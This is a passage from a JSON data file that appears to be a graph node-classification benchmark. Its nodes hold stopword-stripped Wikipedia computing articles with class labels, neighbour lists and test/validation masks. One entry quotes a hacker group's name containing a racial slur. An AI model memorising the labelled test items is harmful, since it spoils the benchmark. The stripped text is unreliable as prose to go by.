bes get sp6 onwards rich content email free/busy search remote search blackberry professional software originally called blackberry enterprise server express first appeared version 4 bes full bes express full cost limited maximum number clients 1 cal included free renamed bes express bps still thing later introduced bes express 5 rather different previous bes express bps primarily allows non-bes devices/subscribers full-fat blackberry experience finally cost/feature competitive exchange activesync devices i.e provides full synchronisation read/unread status deletions mail subfolders including sent items contacts calendar without license costs without requirement expensive sometimes extremely difficult acquire bes tariff example orange uk may make difficult supply bes package/provisioning less 10 handsets time operators often extreme difficulty applying bes package handsets/subscribers originally bis supplied groupwise rim offered blackberry enterprise server version 5.0 available blackberry enterprise server resource kit brk collection useful tools resources released expand manageability blackberry enterprise server tools available free download brk release developed certified compatible particular bes service pack version brk includes tools also special support tools available contact support group bes 10 helps enterprises manage different devices unified interface components deliver experience",
    "neighbors": [
      2208,
      8122,
      6271,
      9408,
      2892,
      3053,
      9101,
      3152,
      6993,
      7857,
      724,
      410,
      9341,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 3950,
    "label": 2,
    "text": "GPD_Win:gpd win gpd win windows-based handheld computer equipped keyboard gaming controls x86-based device runs full version windows 10 home device envisioned primarily video game console emulation pc gaming mind capable running x86 windows-based application run within confines device technical specifications first announced october 2015 crowd funded via indiegogo two crowdfunding sites japan china released october 2016 gamepad digital gpd technology company based shenzhen china among products created several handheld video game consoles run android arm architecture instance gpd xd gpd win meant way play pc games pc-based video game console emulators hypervisors vmware virtualbox clients handheld device appeal win intended x86 windows handheld pc console offers far pc emulator gaming support architectures operating systems widely used mobile devices linux android arm hardware proprietary systems gpd widely touts ability device indiegogo page video demonstrations gamepad digital first pitched idea gpd win community october 2015 concept market research planning november december physical design hardware specifications determined march 2016 initial prototypes finished debugged shipped select sources gpd started accepting pre-orders june 2016 several online retailers including indiegogo page pre-order backers offered device discounted price 330 estimated final retail price 499 settling price 330 release initial stated goal 100,000 april 2016 project well exceeded said goal 535 616,000 raised july 2016 august 2016 small batch shipment industry personnel shipped september pre-order promotional pricing ceased gpd started shipping final product october 2016 pre-order backers receiving devices first gpd win runs windows 10 home gpd stated per april 2014 microsoft decision windows free devices screens smaller 9 inches however devices shipped backers windows 10 product key input initial boot setup device unlike windows smartphones win able run x86 windows application also run pc laptops desktops april 2017 several patches available linux kernel allow mostly complete functionality win full desktop gnu/linux like ubuntu.. also ways get android work gpd win guide install make dual-boot https //www.black-seraph.com gpd win full qwerty keyboard includes 67 standard keys 10 expanded function keys gaming controller stylized similar openpandora dragonbox pyra style keyboard controller layout one d-pad two analog sticks four face buttons four shoulder buttons two shoulder gpd win initially intended use intel atom x5-z8500 cherry trail cpu however gpd eventually upgraded intended cpu likely due availability concerns instead win came intel atom x7-z8750 64-bit quad-core cpu base clock speed around 1.60 ghz turbo boost 2.56 ghz graphics processor intel hd graphics integrated gpu base clock speed 200 mhz turbo boost 600 mhz gpd win uses 4gb lpddr3-1600 ram 64gb rom emmc 4.51 single microsd slot officially support maximum 128gb storage however unofficially support microsd card 256gb gpd win 15.5×9.7cm size 5.5-inch 1280×720 720p h-ips multi-directional touch screen 16:9 ratio reinforced gorilla glass 3 audio system consists built-in speaker using realtek alc5645 driver microphone jack supports popular audio video image formats including mp3 mp4 3gp wmv/wma flac avi mov jpg png bmp gpd win 6700mah polymer lithium-ion battery usb c charging interface 5 v/2.5 stated ability play 80 continuous hours music 6–8 hours online video online gaming bluetooth 4.0 802.11 b/g/n/ac 5 ghz 2.4 ghz wifi capable gamepad digital continued support gpd win past release taking user feedback account driver hardware updates january 10 2017 gpd revised gpd win hardware providing fix intel graphics driver stability issues fixing ac charging/boot bug described reviews section improved cooling well improving tactile feedback d-pad buttons keyboard includes software update improves buttons responsiveness makes changes built-in mouse functionality gamepad digital began shipping gpd win backers october 2016 jc torres slashgear gave win 7/10 stating solid technical specs per expected needs ambitious windows 10-based handheld console industry dominated linux-based handhelds well rounded features however also noted inconsistent build quality among models mediocre sound quality loud low ultimately calls exceptional device brad linder liliputing gave quick review noting unit sent review overheating issues benchmarking speaker placement typically caused user cover fingers however noted solid device price niche capable playing surprising amount pc games video game console emulators windows store steam given tablet-pc specs however meant high-end gaming strongly resource-intensive emulation linus sebastian made video review gpd win linustechtips youtube page complimented gaming multitasking capabilities impressed hardware specs hardware design features overall include i/o ports features instance common macbook lament system flaws among shoulder buttons felt cheaply assembled 5.5 720p screen friendly scaling device bug must plugged ac adapter pressing power button order boot otherwise simply loads charging screen must plugged back system boot starts issue since fixed subsequent releases official verdict deciding whether worth price user win made excited prospect umpcs capable near future hardware progresses compared apple first iphone stating revolutionary great concept flaws execution ambitious practical set much better future gamepad digital announced gpd win 2 early 2017 win 2 significant upgrade able run aaa spec games well better video game console emulation intel core m3 cpu intel hd 615 graphics 8gb lpddr3 ram 128gb m.2 solid-state drive well i/o ports gpd win external hardware changes including moving analog knobs outward d-input dropped additional shoulder button shoulder six total price crowdfunding backers 649 tentative retail price 899 indiegogo campaign launched january 15 2018 final release date may 2018 indiegogo campaign saw rapid success far surpassing stated goal within days",
    "neighbors": [
      9732,
      582,
      6153,
      9964,
      7983,
      1776,
      499,
      10900,
      823,
      1624
    ],
    "mask": "None"
  },
  {
    "node_id": 3951,
    "label": 1,
    "text": "Toad_Data_Modeler:toad data modeler toad data modeler database design tool allowing users visually create maintain document new existing database systems deploy changes data structures across different platforms used construct logical physical data models compare synchronize models generate complex sql/ddl create modify scripts reverse forward engineer databases data warehouse systems toad data modelling software used database design maintenance documentation toad data modeler previously called case studio 2 acquired charonware quest software 2006 quest software acquired dell september 28 2012 october 31 2016 dell finalized sale dell software francisco partners elliott management relaunched november 1 2016 quest software toad products typically 2 releases per year",
    "neighbors": [
      7523,
      10340,
      8808,
      1560,
      1037,
      7022,
      7983,
      10413,
      11472,
      2901,
      4630,
      4919,
      1400,
      9177,
      5210,
      8539,
      6780
    ],
    "mask": "Test"
  },
  {
    "node_id": 3952,
    "label": 8,
    "text": "RSDL:rsdl restful service description language rsdl machine- human-readable xml description http-based web applications typically rest web services language defined michael pasternak work ovirt restful api allows documenting model resource provided service relationships operations parameters must supplied operations specifies parameters mandated describes possible overloads parameters sets rsdl intended simplify reuse web services based http architecture web platform- language-independent aims promote reuse applications beyond basic use web browser humans machines unlike wadl concentrates describing uris stand-alone entry points application invoked different ways require traversing uri components figure uri structure supports uri/headers/body parameters overloads makes human-readable easily consumed humans machines rsdl represents different uris stand-alone entry points application following resource uris one figure methods available given resources resources consumed uri rsdl contains necessary information generate http request easily consumed accessing uri internals uri rsdl contains rel description attributes describing meaning given operation uri humans easily fetch available operations given collection/resource simply locating different descriptors within uri",
    "neighbors": [
      10465,
      7592,
      10193,
      1266,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 3953,
    "label": 2,
    "text": "BIOS_parameter_block:bios parameter block computing bios parameter block often shortened bpb data structure volume boot record vbr describing physical layout data storage volume partitioned devices hard disks bpb describes volume partition whereas unpartitioned devices floppy disks describes entire medium basic bpb appear used partition including floppy disks presence often necessary however certain filesystems also make use describing basic filesystem structures filesystems making use bios parameter block include fat12 except dos 1.x fat16 fat32 hpfs ntfs due different types fields amount data contain length bpb different fat16 fat32 ntfs boot sectors detailed discussion various fat bpb versions entries found fat article combined 11-byte data structure start volume boot records immediately preceding bpb ebpb also called fdc descriptor extended fdc descriptor ecma-107 iso/iec 9293 describes fat flexible/floppy optical disk cartridges format standard dos 2.0 bpb fat12 13 bytes format standard dos 3.0 bpb fat12 fat16 19 bytes already supported versions ms-dos 2.11 format standard dos 3.2 bpb fat12 fat16 21 bytes format standard dos 3.31 bpb fat12 fat16 fat16b 25 bytes format pc dos 3.4 os/2 1.0-1.1 extended bpb fat12 fat16 fat16b 32 bytes format dos 4.0 os/2 1.2 extended bpb fat12 fat16 fat16b hpfs 51 bytes format short dos 7.1 extended bios parameter block 60 bytes fat32 format full dos 7.1 extended bios parameter block 79 bytes fat32 format extended bpb ntfs 73 bytes",
    "neighbors": [
      5413,
      2055,
      1801,
      6506,
      7244,
      8301,
      9166,
      2193,
      9907,
      2811
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3954,
    "label": 9,
    "text": "Java_API_for_XML_Processing:java api xml processing computing java api xml processing jaxp one java xml application programming interfaces api provides capability validating parsing xml documents three basic parsing interfaces addition parsing interfaces api provides xslt interface provide data structural transformations xml document jaxp developed java community process jsr 5 jaxp 1.0 jsr 63 jaxp 1.1 1.2 jsr 206 jaxp 1.3 jaxp version 1.4.4 released september 3 2010 jaxp 1.3 declared end-of-life february 12 2008 dom interface parses entire xml document constructs complete in-memory representation document using classes modeling concepts found document object model dom level 2 core specification dom parser called codice_1 builds in-memory codice_2 representation javax.xml.parsers.documentbuilder created javax.xml.parsers.documentbuilderfactory codice_1 creates instance tree structure containing nodes xml document tree node structure implements interface among many different types tree nodes representing type data found xml document important include javax.xml.parsers.saxparserfactory creates sax parser called saxparser unlike dom parser sax parser create in-memory representation xml document runs faster uses less memory instead sax parser informs clients xml document structure invoking callbacks invoking methods org.xml.sax.helpers.defaulthandler instance provided parser way accessing document called streaming xml codice_4 class implements contenthandler errorhandler dtdhandler entityresolver interfaces clients interested methods defined codice_5 interface called sax parser encounters corresponding elements xml document important methods interface clients provide subclass codice_4 overrides methods processes data may involve storing data database writing stream parsing parser may need access external documents possible store local cache frequently used documents using xml catalog introduced java 1.3 may 2000 stax designed median dom sax interface metaphor programmatic entry point cursor represents point within document application moves cursor forward 'pulling information parser needs different event based api sax 'pushes data application requiring application maintain state events necessary keep track location within document xml stylesheet language transformations xslt allows conversion xml document forms data jaxp provides interfaces package javax.xml.transform allowing applications invoke xslt transformation interface originally called trax transformation api xml developed informal collaboration developers number java xslt processors main features interface two abstract interfaces source result defined represent input output transformation somewhat unconventional use java interfaces since expectation processor accept class implements interface processor choose kinds source result prepared handle practice jaxp processors support three standard kinds source codice_12 codice_13 codice_14 three standard kinds result codice_15 codice_16 codice_17 possibly implementations primitive complete example xslt transformation launching may look like applies following hardcoded xslt transformation following hardcoded xml document result execution",
    "neighbors": [
      9988,
      3341,
      10526,
      6067,
      6328,
      2106,
      3517,
      6334,
      3518,
      3008,
      11582,
      1095,
      3278,
      3920,
      4959,
      4960,
      479,
      3558,
      1128,
      3560,
      3562,
      502
    ],
    "mask": "Test"
  },
  {
    "node_id": 3955,
    "label": 4,
    "text": "G_Data_Software:g data software g data software ag german software company focuses computer security company founded 1985 headquartered bochum known creators world first antivirus software g data use multiple scanning engines one developed in-house bitdefender engine g data provides several security products targeted home business markets company north american subsidiary located atlanta georgia g data founded bochum germany 1985 company introduced first computer security product anti-virus kit avk 1988 atari st. beside focus security market g data also created software voice recognition invox speech synthesis logox g data computer security products use two scan-engines originally avast bitdefender 2014 release introduced scan-engine closegap replaced avast however upgrade new version painless users weaker computers experienced system slowdowns company promptly solved issue update september 2015 g data launched new messaging app called secure chat used signal protocol application based fork signal source code published gplv3 license g data discontinued service may 2018 features g data solutions support",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      4746,
      7948,
      3981,
      10637,
      4374,
      10392,
      665,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      9523,
      10166,
      5305,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      4956,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      6643,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 3956,
    "label": 4,
    "text": "Goatse_Security:goatse security goatse security goatsec loose-knit nine-person grey hat hacker group specializes uncovering security flaws division anti-blogging internet trolling organization known gay nigger association america gnaa group derives name goatse.cx shock site chose gaping holes exposed slogan june 2010 goatse security obtained email addresses approximately 114,000 apple ipad users led fbi investigation filing criminal charges two group members gnaa several security researchers within membership according goatse security spokesperson leon kaiser gnaa could fully utilize talents since group believed would anyone would take security data published gnaa seriously order create medium gnaa members publish security findings gnaa created goatse security december 2009 order protect web browser inter-protocol exploitation mozilla blocked several ports html forms would normally access january 2010 gnaa discovered mozilla blocks cover port 6667 left mozilla browsers vulnerable cross-protocol scripts gnaa crafted javascript-based exploit order flood irc channels although efnet oftc able block attacks freenode struggled counteract attacks goatse security exposed vulnerability one members andrew auernheimer aka weev posted information exploit encyclopedia dramatica march 2010 goatse security discovered integer overflow vulnerability within apple web browser safari posted exploit encyclopedia dramatica found person could access blocked port adding 65,536 port number vulnerability also found arora icab omniweb stainless although apple fixed glitch desktop versions safari march company left glitch unfixed mobile versions browser goatse security claimed hacker could exploit mobile safari flaw order gain access cause harm apple ipad june 2010 goatse security uncovered vulnerability within website provider 3g service apple ipad united states time signing 3g service ipad retrieves icc-id ipad sim card associates email address provided sign-up order ease log-in process ipad website receives sim card icc-id pre-populates email address field address provided sign-up goatse security realized sending http request valid icc-id embedded inside website website would reveal email address associated icc-id june 5 2010 daniel spitler aka jacksonbrown began discussing vulnerability possible ways exploit including phishing irc channel goatse security constructed php-based brute force script would send http requests random icc-ids website legitimate icc-id entered would return email address corresponding icc-id script dubbed ipad 3g account slurper goatse security attempted find appropriate news source confide leaked information weev attempted contact news corporation thomson reuters executives including arthur siskind security problems june 6 2010 weev sent emails icc-ids recovered order verify claims chat logs period also reveal attention publicity may incentives group contrary first claimed group initially revealed security flaw gawker media notifying also exposed data 114,000 ipad users including celebrities government military tactics re-provoked significant debate proper disclosure security flaws weev maintained goatse security used common industry standard practices said tried good guys jennifer granick electronic frontier foundation also defended tactics used goatse security june 14 2010 michael arrington techcrunch awarded group crunchie award public service first time crunchie awarded outside annual crunchies award ceremony fbi opened investigation incident leading criminal complaint january 2011 raid andrew weev auernheimer house search related investigation auernheimer subsequently detained released bail state drug charges later dropped release bail broke gag order protest dispute legality search house denial access public defender also asked donations via paypal defray legal costs 2011 department justice announced charged one count conspiracy access computer without authorization one count fraud co-defendant daniel spitler released bail november 20 2012 auernheimer found guilty one count identity fraud one count conspiracy access computer without authorization tweeted would appeal ruling alex pilosov friend also present ruling tweeted auernheimer would remain free bail sentencing least 90 days november 29 2012 auernheimer authored article wired magazine entitled forget disclosure hackers keep security holes advocating disclosure zero-day exploit individuals use interests social justice april 11 2014 third circuit issued opinion vacating auernheimer conviction basis venue new jersey improper judges address substantive question legality site access released prison late april 11 may 2011 dos vulnerability affecting several linux distributions disclosed goatse security group discovered lengthy advanced packaging tool url would cause compiz crash september 2012 goatse security credited microsoft helping secure online services",
    "neighbors": [
      1024,
      5636,
      2579,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      7734,
      575,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      4733,
      3711,
      8320,
      5251,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      8386,
      3789,
      4304,
      4310,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      823,
      1337,
      6484,
      857,
      1882,
      7515,
      4956,
      3941,
      8557,
      9082,
      3462,
      6539,
      11152,
      3473,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8644,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 3957,
    "label": 3,
    "text": "Flash_Gordon_(video_game):flash gordon video game flash gordon video game based comic book character name game published 1986 mastertronic amstrad cpc commodore 64 zx spectrum msx personal computers zzap 64 praised commodore 64 version game reviewers appreciated gameplay variety offered three different sections game quality graphics sound rated 89 overall also 1982 game tie 1980 film released atari 2600 oct. 7 2015 mobile game also based film released infinite runner type game developed boluga limited featured three songs queen flash ’ theme vultan ’ theme football fight flash gordon also 1990 defenders earth video game enigma variations",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3958,
    "label": 2,
    "text": "WHQL_Testing:whql testing windows hardware quality labs testing whql testing microsoft testing process involves running series tests third-party hardware software submitting log files tests microsoft review procedure may also include microsoft running tests wide range equipment different hardware different microsoft windows editions products pass whql tests get use certified windows logotype certifies hardware software share testing microsoft ensure compatibility actual logo used depends version microsoft windows device drivers passing whql tests microsoft creates digitally signed certification file included driver installation package allows installation 64-bit versions windows prevents 32-bit versions versions displaying warning message driver certified microsoft see screenshot right new since june 2007 requirement audio fidelity test equipment audio precision sys-2722-a-m system submissions company choose sign drivers rather go whql testing process drivers would qualify certified windows logos would install 64-bit versions windows install without warning message 32-bit versions however install without warning message device drivers passed whql tests also made available download using windows update microsoft update catalog detects new device built-in drivers show found new hardware wizard see screenshot right one way avoid found new hardware wizard popping pre-installing whql certified driver device plugged microsoft longer requires whql testing fee used usd 250 per operating system family fee covers 32-bit x86 64-bit x64 versions submitted simultaneously non-refundable fee include expenses windows server 2008 x64 license necessary running whql tests verisign certificate necessary submitting test results sometimes ambiguity responsible providing drivers supported case industry standard devices used much broadly pc platform microsoft supply drivers example whql bluetooth stereo headsets",
    "neighbors": [
      608,
      8161,
      11584,
      6797,
      1656
    ],
    "mask": "Test"
  },
  {
    "node_id": 3959,
    "label": 5,
    "text": "Matrix_(protocol):matrix protocol matrix open standard lightweight protocol real-time communication designed allow users accounts one communications service provider communicate users different service provider via online chat voice ip videotelephony aims make real-time communication work seamlessly different service providers like standard simple mail transfer protocol email store-and-forward email service technical perspective application layer communication protocol federated real-time communication provides http apis open source reference implementations securely distributing persisting messages json format open federation servers integrate standard web services via webrtc facilitating browser-to-browser applications initial project created inside amdocs building chat tool called amdocs unified communications matthew hodgson amandine le pape amdocs funded development work 2014 october 2017 matrix winner innovation award webrtc 2014 conference expo best show award webrtc world 2015 protocol received praise mixed cautionary notes launched 2014 reviewers noted attempts defining open instant messaging multimedia signalling protocol type difficulties becoming widely adopted—e.g xmpp ircv3—and highlighted challenges involved technological political unclear enough demand among users services interoperate among providers 2015 subsidiary amdocs created named vector creations limited matrix staff moved july 2017 funding amdocs announced cut following weeks core team created uk-based company new vector mainly built support matrix riot development time period multiple calls support community companies build matrix help pay wages least part core team patreon liberapay crowdfunding accounts created core team started video podcast called matrix live keep contributors speed ongoing developments expanded weekly blog format called week matrix interested community members could read submit matrix-related news company created goal offering consultancy services matrix paid hosting matrix servers platform called modular.im generate income early weeks creation matrix team company purism published plans collaborate creation librem 5 phone librem 5 intended matrix native phone default pre-installed messaging caller app use matrix audio video calls instant messaging 2017 kde announced working including support protocol irc client konversation late january 2018 company received investment us 5 million status ethereum based startup april 2018 french government announced plans create instant messaging tool later confirmed matrix team based riot matrix new vector said provide support government endeavour october 2018 private company limited guarantee called matrix.org foundation incorporated serve neutral legal entity development standard february 2019 kde community announced adopt matrix internal communications needs decentralized alternative modern tools like telegram slack discord operate server instance april 2019 matrix.org suffered security breach production servers compromised breach issue matrix protocol directly affect homeservers matrix.org june 2019 matrix protocol beta version 1.0 across apis synapse time reference homeserver matrix foundation officially launched matrix targets use cases like voice ip internet things instant messaging including group communication along longer-term goal generic messaging data synchronization system web protocol supports security replication maintaining full conversation history single points control failure existing communication services integrate matrix ecosystem client software available open-federated instant messaging im voice ip voip internet things iot communication matrix standard specifies restful http apis securely transmitting replicating json data matrix-capable clients servers services clients send data puting ‘ room ’ server replicates data matrix servers participating ‘ room ’ data signed using git-style signature mitigate tampering federated traffic encrypted https signed server ’ private key avoid spoofing replication follows eventual consistency semantics allowing servers function even offline data-loss re-synchronizing missing history participating servers olm library provides optional end-to-end encryption room-by-room basis via double ratchet algorithm implementation ensure conversation data rest readable room participants configured data transmitted matrix visible ciphertext matrix servers decrypted authorized participants room olm megolm expansion olm better suit need bigger rooms libraries subject cryptographic review ncc group whose findings publicly available addressed matrix team review sponsored open technology fund matrix support bridging messages different chat applications matrix rooms bridges programs run server communicate non-matrix servers bridges either acting puppets relays former individual users account visibly posting messages latter bot posts messages non puppeteered user accounts currently official bridges following bridges maintained community riot reference implementation client fractal official client gnome desktop many clients bots bridges servers implementations matrix protocol also exist",
    "neighbors": [
      2050,
      5251,
      10242,
      5382,
      10631,
      2057,
      4746,
      8331,
      1036,
      11408,
      3350,
      2458,
      3228,
      10271,
      3105,
      9511,
      1962,
      7723,
      9519,
      1969,
      2994,
      9909,
      8758,
      1467,
      1083,
      2111,
      6208,
      8640,
      1218,
      7490,
      9281,
      2760,
      2892,
      6993,
      11221,
      7384,
      8283,
      4318,
      3168,
      7139,
      3812,
      4068,
      6628,
      2802,
      756,
      5749,
      119,
      7928,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 3960,
    "label": 9,
    "text": "Fortran:fortran fortran formerly fortran derived formula translation general-purpose compiled imperative programming language especially suited numeric computation scientific computing originally developed ibm 1950s scientific engineering applications fortran came dominate area programming early continuous use six decades computationally intensive areas numerical weather prediction finite element analysis computational fluid dynamics computational physics crystallography computational chemistry popular language high-performance computing used programs benchmark rank world fastest supercomputers fortran encompasses lineage versions evolved add extensions language usually retaining compatibility prior versions successive versions added support structured programming processing character-based data fortran 77 array programming modular programming generic programming fortran 90 high performance fortran fortran 95 object-oriented programming fortran 2003 concurrent programming fortran 2008 fortran design basis many programming languages among better known basic based fortran ii number syntax cleanups notably better logical structures changes work easily interactive environment names earlier versions language fortran 77 conventionally spelled all-capitals fortran 77 last version use lowercase letters keywords strictly non-standard capitalization dropped referring newer versions beginning fortran 90 official language standards refer language fortran rather all-caps fortran late 1953 john w. backus submitted proposal superiors ibm develop practical alternative assembly language programming ibm 704 mainframe computer backus historic fortran team consisted programmers richard goldberg sheldon f. best harlan herrick peter sheridan roy nutt robert nelson irving ziller harold stern lois haibt david sayre concepts included easier entry equations computer idea developed j. halcombe laning demonstrated laning zierler system 1952 programmers chess players chosen work ibm thought logical minds draft specification ibm mathematical formula translating system completed november 1954 first manual fortran appeared october 1956 first fortran compiler delivered april 1957 first optimizing compiler customers reluctant use high-level programming language unless compiler could generate code performance comparable hand-coded assembly language community skeptical new method could possibly outperform hand-coding reduced number programming statements necessary operate machine factor 20 quickly gained acceptance john backus said 1979 interview think ibm employee magazine much work come lazy n't like writing programs working ibm 701 writing programs computing missile trajectories started work programming system make easier write programs language widely adopted scientists writing numerically intensive programs encouraged compiler writers produce compilers could generate faster efficient code inclusion complex number data type language made fortran especially suited technical applications electrical engineering 1960 versions fortran available ibm 709 650 1620 7090 computers significantly increasing popularity fortran spurred competing computer manufacturers provide fortran compilers machines 1963 40 fortran compilers existed reasons fortran considered first widely used cross-platform programming language development fortran paralleled early evolution compiler technology many advances theory design compilers specifically motivated need generate efficient code fortran programs initial release fortran ibm 704 contained 32 statements including arithmetic statement reminiscent readily implementable three-way comparison instruction cas compare accumulator storage available 704 statement provided way compare numbers testing difference attendant risk overflow deficiency later overcome logical facilities introduced fortran iv statement used originally optionally give branch probabilities three branch cases arithmetic statement first fortran compiler used weighting perform compile time monte carlo simulation generated code results used optimize placement basic blocks memory sophisticated optimization time monte carlo technique documented backus et al paper original implementation fortran automatic coding system fundamental unit program basic block basic block stretch program one entry point one exit point purpose section 4 prepare section 5 table predecessors pred table enumerates basic blocks lists every basic block basic blocks immediate predecessor flow together absolute frequency basic block link table obtained running program monte-carlo fashion outcome conditional transfers arising if-type statements computed go determined random number generator suitably weighted according whatever frequency statements provided many years later statement effect code treated comment statement since compilers longer kind compile-time simulation similar fate befallen compiler hints several programming languages example c keyword first fortran compiler reported diagnostic information halting program error found outputting error code console code could looked programmer error messages table operator manual providing brief description problem later error handling subroutine handle users error division zero developed nasa incorporated giving users feedback line code error appeared development disk files text editors terminals programs often entered keypunch keyboard onto 80-column punched cards one line card resulting deck cards would fed card reader compiled punched card codes included lower-case letters many special characters special versions ibm 026 keypunch offered would correctly print re-purposed special characters used fortran reflecting punched card input practice fortran programs originally written fixed-column format first 72 columns read twelve 36-bit words letter c column 1 caused entire card treated comment ignored compiler otherwise columns card divided four fields columns 73 80 could therefore used identification information punching sequence number text could used re-order cards stack cards dropped though practice reserved stable production programs ibm 519 could used copy program deck add sequence numbers early compilers e.g. ibm 650 additional restrictions due limitations card readers keypunches could programmed tab column 7 skip column 72 later compilers relaxed fixed-format restrictions requirement eliminated fortran 90 standard within statement field whitespace characters blanks ignored outside text literal allowed omitting spaces tokens brevity including spaces within identifiers clarity example valid identifier equivalent 101010do101i=1,101 valid statement equivalent 10101 101 1 101 zero column 6 treated space 101010do101i=1.101 instead 10101 do101i 1.101 assignment 1.101 variable called do101i note slight visual difference comma period hollerith strings originally allowed format data statements prefixed character count letter h e.g. allowing blanks retained within character string miscounts problem ibm fortran ii appeared 1958 main enhancement support procedural programming allowing user-written subroutines functions returned values parameters passed reference common statement provided way subroutines access common global variables six new statements introduced next years fortran ii would also add support data types early fortran compilers supported recursion subroutines early computer architectures supported concept stack directly support subroutine calls return location often stored one fixed location adjacent subroutine code e.g ibm 1130 specific machine register ibm 360 et seq allows recursion stack maintained software return address stored stack call made restored call returns although specified fortran 77 many f77 compilers supported recursion option burroughs mainframes designed recursion built-in default became standard fortran 90 via new keyword recursive program heron formula reads data tape reel containing three 5-digit integers b c input type declarations available variables whose name starts j k l n fixed-point i.e integers otherwise floating-point since integers processed example names variables start letter name variable must start letter continue letters digits limit six characters fortran ii b c represent sides triangle plane geometry program execution end error code stop 1 otherwise output line printed showing input values b c followed computed area triangle floating-point number occupying ten spaces along line output showing 2 digits decimal point .2 f10.2 format statement label 601 c area triangle standard square root function c input tape reader unit 5 integer input c output line printer unit 6 real output c input error display error output code 1 job control listing c ia ib ic may negative zero c furthermore sum two sides triangle c must greater third side check c using heron formula calculate c area triangle ibm also developed fortran iii 1958 allowed inline assembly code among features however version never released product like 704 fortran fortran ii fortran iii included machine-dependent features made code written unportable machine machine early versions fortran provided vendors suffered disadvantage fortran provided ibm 1401 computer innovative 63-phase compiler ran entirely core memory 8000 six-bit characters compiler could run tape 2200-card deck used tape disk storage kept program memory loaded overlays gradually transformed place executable form described haines article reprinted edited editions anatomy compiler ibm manual fortran specifications operating procedures ibm 1401 executable form entirely machine language rather floating-point arithmetic sub-scripting input/output function references interpreted preceding ucsd pascal p-code two decades ibm later provided fortran iv compiler 1400 series computers starting 1961 result customer demands ibm began development fortran iv removed machine-dependent features fortran ii adding new features data type logical boolean expressions logical statement alternative arithmetic statement fortran iv eventually released 1962 first ibm 7030 stretch computer followed versions ibm 7090 ibm 7094 later ibm 1401 1966 1965 fortran iv supposed compliant standard developed american standards association x3.4.3 fortran working group 1966 1968 ibm offered several fortran iv compilers system/360 named letters indicated minimum amount memory complier needed run letters f g h matched codes used system/360 model numbers indicate memory size letter increment factor two larger time fortran iv started become important educational tool implementations university waterloo watfor watfiv created simplify complex compile link processes earlier compilers perhaps significant development early history fortran decision american standards association american national standards institute ansi form committee sponsored bema business equipment manufacturers association develop american standard fortran resulting two standards approved march 1966 defined two languages fortran based fortran iv served de facto standard basic fortran based fortran ii stripped machine-dependent features fortran defined first standard officially denoted x3.9-1966 became known fortran 66 although many continued term fortran iv language standard largely based fortran 66 effectively became first industry-standard version fortran fortran 66 included release fortran 66 standard compiler vendors introduced several extensions standard fortran prompting ansi committee x3j3 1969 begin work revising 1966 standard sponsorship cbema computer business equipment manufacturers association formerly bema final drafts revised standard circulated 1977 leading formal approval new fortran standard april 1978 new standard called fortran 77 officially denoted x3.9-1978 added number significant features address many shortcomings fortran 66 revision standard number features removed altered manner might invalidate formerly standard-conforming programs removal allowable alternative x3j3 time since concept deprecation yet available ansi standards 24 items conflict list see appendix a2 x3.9-1978 addressed loopholes pathological cases permitted prior standard rarely used small number specific capabilities deliberately removed dimension 10,5 control data corporation computers another version fortran 77 called minnesota fortran mnf designed especially student use variations output constructs special uses commons data statements optimizations code levels compiling detailed error listings extensive warning messages debugs development revised standard succeed fortran 77 would repeatedly delayed standardization process struggled keep rapid changes computing programming practice meantime standard fortran nearly fifteen years fortran 77 would become historically important dialect important practical extension fortran 77 release mil-std-1753 1978 specification developed u.s. department defense standardized number features implemented fortran 77 compilers included ansi fortran 77 standard features would eventually incorporated fortran 90 standard ieee 1003.9 posix standard released 1991 provided simple means fortran 77 programmers issue posix system calls 100 calls defined document allowing access posix-compatible process control signal handling file system control device control procedure pointing stream i/o portable manner much-delayed successor fortran 77 informally known fortran 90 prior fortran 8x finally released iso/iec standard 1539:1991 1991 ansi standard 1992 addition changing official spelling fortran fortran major revision added many new features reflect significant changes programming practice evolved since 1978 standard unlike prior revision fortran 90 removed features appendix b.1 says list deleted features standard empty standard-conforming fortran 77 program also standard-conforming fortran 90 either standard usable define behavior small set features identified obsolescent expected removed future standard functionalities early version features performed new fortran 95 features kept simplify porting old programs may eventually deleted fortran 95 published officially iso/iec 1539-1:1997 minor revision mostly resolve outstanding issues fortran 90 standard nevertheless fortran 95 also added number extensions notably high performance fortran specification number intrinsic functions extended example argument added intrinsic several features noted fortran 90 obsolescent removed fortran 95 important supplement fortran 95 iso technical report tr-15581 enhanced data type facilities informally known allocatable tr specification defined enhanced use arrays prior availability fully fortran 2003-compliant fortran compilers uses include arrays derived type components procedure dummy argument lists function return values arrays preferable -based arrays arrays guaranteed fortran 95 deallocated automatically go scope eliminating possibility memory leakage addition elements allocatable arrays contiguous aliasing issue optimization array references allowing compilers generate faster code case pointers another important supplement fortran 95 iso technical report tr-15580 floating-point exception handling informally known ieee tr specification defined support ieee floating-point arithmetic floating point exception handling addition mandatory base language defined iso/iec 1539-1 1997 fortran 95 language also includes two optional modules together compose multi-part international standard iso/iec 1539 according standards developers optional parts describe self-contained features requested substantial body users and/or implementors deemed sufficient generality required standard-conforming fortran 